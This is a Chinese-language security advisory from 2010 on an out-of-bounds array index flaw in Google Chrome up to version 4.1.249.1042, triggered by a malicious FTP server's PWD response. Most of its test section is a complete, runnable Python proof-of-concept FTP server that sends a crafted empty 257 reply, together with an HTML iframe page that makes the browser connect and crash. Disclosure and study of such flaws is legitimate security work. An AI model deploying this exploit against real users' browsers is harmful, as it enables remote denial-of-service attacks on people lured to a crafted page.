Google Chrome OOB数组索引FTP PWD响应拒绝服务漏洞
发布日期:2010-03-31
更新日期:2010-03-31
受影响系统:Google Chrome <= 4.1.249.1042 (Build 42199)
描述:
Google Chrome是由Google开发的一款Web浏览工具。
Google Chrome没有正确处理FTP PWD命令服务器响应,在实现上存在越界数组索引漏洞,通过诱使受害者浏览特制网站,其中包含指向恶意FTP服务器的iframe,远程攻击者可利用此漏洞造成浏览器崩溃。
<*来源:Tobias Klein
链接:
http://www.enigmagroup.org/exploits/platform/windows/dos/21248/%22Google-Chrome-4.1-OOB-Array-Indexing-Bug%22.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Malicious FTP server:
K:\BUGS\CHROME>type poc.py
from socket import *
from struct import pack
from time import sleep
host = "0.0.0.0"
port = 21
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Google Chrome (4.1.249.1042) Denial of Service poc"
print "[+] Listening on port %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
buffer = "220 Google Chrome (4.1.249.1042) Denial of Service poc"
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)
buffer = "331 Password required for anonymous."
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)
buffer = "230 User anonymous logged in."
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)
buffer = "215 UNIX Type: bib"
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)
buffer = "257 \"\""
buffer += "\r\n"
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(1)
cl.close()
s.close()
- - - - - ---
Start the poc server:
K:\BUGS\CHROME>python poc.py
[+] Google Chrome (4.1.249.1042) Denial of Service poc
[+] Listening on port 21 ...
Open the following sample HTML page in Chrome:
- - - - - ---
<html>
<body>
<iframe name="POC" src="
ftp://127.0.0.1">
</body>
<html>
- - - - - ---
建议:
厂商补丁:
Google
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.google.com浏览次数:2475
严重程度:0(网友投票)
